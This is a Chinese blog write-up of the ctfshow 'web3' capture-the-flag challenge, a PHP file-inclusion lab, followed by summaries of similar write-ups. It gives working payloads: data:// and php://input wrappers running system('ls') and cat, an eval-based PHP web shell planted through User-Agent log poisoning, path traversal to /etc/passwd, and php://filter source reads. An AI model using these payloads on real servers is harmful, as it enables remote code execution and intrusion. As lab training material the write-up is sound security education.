ctfshow web3

最新推荐文章于 2024-05-16 10:37:22 发布
最新推荐文章于 2024-05-16 10:37:22 发布
阅读量467 收藏
点赞数 8
分类专栏: 文件包含 文章标签: web3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/meiyouis/article/details/138561520
版权

Get传入一个url值,根据关键字include可以确定是文件包含。因为是简单类,无过虑。这里有多种解法。

第一种,利用php伪协议data来构造请求体,在php伪协议data部分可以通过{data://text/plain,<?php system(“ls”);?>}这种形式来构造请求体

接着构造请求体data://text/plain,<?php system(“cat ctf_go_go_go”);?>

第二种方法是通过包含日志文件,使用bp抓包来更改ua头来写入shell文件url=/var/log/nginx/access.log来包含日志文件

在UA头后写入shell文件<?php @eval($_POST[a]);?>

再使用蚁剑连接

林如海.
关注
专栏目录
2024年网安最全ctfshow-WEB-web3_ctfshow web3
2401_84264610的博客
05-01 72
php://input 可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php:/input将会无效。页面中显示了部分源码,明显是引导我们利用文件包含漏洞进行操作,源码中的include()函数通过GET请求接收一个url参数,那接下来我们就给它传递一个url参数。我们直接在url地址栏中拼接url参数,访问crf_go_go_go文件。很明显这个crf_go_go_go文件就是存放flag的文件。
Hydra post登录框爆破,2024年最新网络安全高级面试题pdf
wdsfgj的博客
04-15 356
可以看到错误时都是1523,将该值替换到 if content_size!获取登录失败时的错误提示:username or password is not exists~然后开启print(len(response.text))获取错误登录时的长度。然后准备一个python脚本,将路径和ip替换到相应位置,如下所示。同时注释print(len(response.text))提取其中的POST路径:/dvwa/login.php。首先准备一个带token的登录页面。可以看到顺利爆破出了用户名密码。
ctfshow-web(三)
qq_47804678的博客
12-06 976
这个打开就是一段代码: 不太会php,查了一下,知道了:assert()是一个断言函数,如果条件判断错误会终止程序;die() 函数输出一条消息,并退出当前脚本。然后还有一个intval()函数,他是用来获取变量的整数值。其实可以看出来,有两个对num值的判断,且都要为真才能达到flag,那么就可以利用intval()函数的一些特点进行绕过。这里利用的是加法绕过:intval()函数中用字符串方式表示科学计数法时,函数的返回值是科学计数法前面的一个数,而对于科学计数法加数字则会返回科学计数法的数值;也就是说
ctfshow-WEB-web3
热门推荐
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块的第3关是一个文件包含漏洞,include()函数包含的文件会被执行,我们使用PHP伪协议配合抓包工具进行命令执行,从而获取flag 这一关的flag就存放在网站跟路径下的文件中 php://input可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php:/input将会无效 页面中显示了部分源码,明显是引导我们利用文件包含漏洞进行操作,源码中的inc...
刷题之旅第23站,CTFshow web3
cc菜的一批
02-16 1451
感谢ctf show平台提供题目 使用php伪协议 + include, 实现执行任意命令。 <?php system('ls');?> 获取flag <?php system('cat ctf_go_go_go');?> 原创文章不易,点个赞再走吧。 ...
CTFshow-web-web3
qq_68581192的博客
10-07 122
-- post请求内容构造需要执行的代码。url=php://input – GET请求的url中拼接伪协议。使用Burp Suite进行抓包,利用php://input伪协议执行PHP代码。我们在url地址栏中拼接url参数,访问ctf_go_go_go,显示如下。点击放包,回到页面,显示如下。
CTFshow web3 详细解题思路
asdfghjklqwwe的博客
05-17 771
使用伪协议以及hackbar
2024年网安最全ctfshow-WEB-web3_ctfshow web3(1)
2401_84264583的博客
05-01 558
php://input 可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php:/input将会无效。ctf.show WEB模块的第3关是一个文件包含漏洞,include()函数包含的文件会被执行,我们使用PHP伪协议配合抓包工具进行命令执行,从而获取flag。很明显这个crf_go_go_go文件就是存放flag的文件。这一关的flag就存放在网站跟路径下的文件中。
ctfshow-web3
HAI_WD的博客
07-27 747
php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。发现一个ctf_go_go_go的文件,然后读取就是了。这个题目一看就知道是一个文件包含漏洞。所以就可以直接执行命令。
ctf.show web3
m0_63028223的博客
04-25 1481
打开题目,出现提示,php文件?,考虑文件包含漏洞。 输入参数:?url=/etc/passwd 这个报错界面出来了,说明存在文件包含漏洞 构造url值 =php://input 使用php协议 使用burp抓包 使用ls命令查看php下的文件 得到文件路径。。。。 使用cat方法查看 最终得到flag。。。。。。。。 发文助手检测到文字太少,无奈再说点什么吧,信息安全渗透,学习需要一个积累的过程,需要可以不精通但最少了解 php,java,j...
CTFShow Web3
qq_62566956的博客
03-27 155
说不定这是一个可以迁移的思路:没思路的时候抓个包看看,可能会有意外收获。没思路的时候抓个包看看,可能会有意外收获。
CTFshow WEB web3
Y1da的博客
04-19 416
CTFshow WEB web3 进入环境,题目提示存在文件包含漏洞 <?php include($_GET['url']);?> 使用PHP伪协议 ?url=data://text/plain,<?php% system('ls');?> ctf_go_go_go index.php ?url=php://filter/convert.base64-encode/resource=ctf_go_go_go Y3Rmc2hvd3swNjNmNWZkYS0wZmU3L
ctfshow_web3
qq_45891669的博客
04-27 840
CTFshow_web3 关于CTFshow_web3解题步骤: 打开容器可以看到一小段php代码,可以看出是文件包含,可能涉及文件包含漏洞,可以拿 ?url=../../../../../../../../../../etc/passwd 去测试一下,看有没有文件包含漏洞 测试成功 确认存在php文件包含漏洞可以使用Burpsuit去抓包,并且使用php伪协议中的php://input来在包的最下面写上<?php system("ls");?>执行系统命令查看当前目录的文件,看看有没有fl
ctfshow-WEB-web3_ctfshow web3
最新发布
2401_84297944的博客
05-16 286
这一关的flag就存放在网站跟路径下的文件中php://input 可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php:/input将会无效页面中显示了部分源码,明显是引导我们利用文件包含漏洞进行操作,源码中的include()函数通过GET请求接收一个url参数,那接下来我们就给它传递一个url参数。
CTFshow WEB入门 web3
m0_73912575的博客
10-25 217
CTF.show WEB入门--web3 题解write up
ctfshow刷题-web3
m0_52011198的博客
02-22 189
php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。从而导致任意代码执行。include里面的参数是url,提示了可以利用php://伪协议来进行代码执行。猜测ctf_go_go_go中含有flag,利用cat命令进行查看,得到flag。利用burp进行抓包,在包中写入想要执行对的代码,先使用ls命令查看一下文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值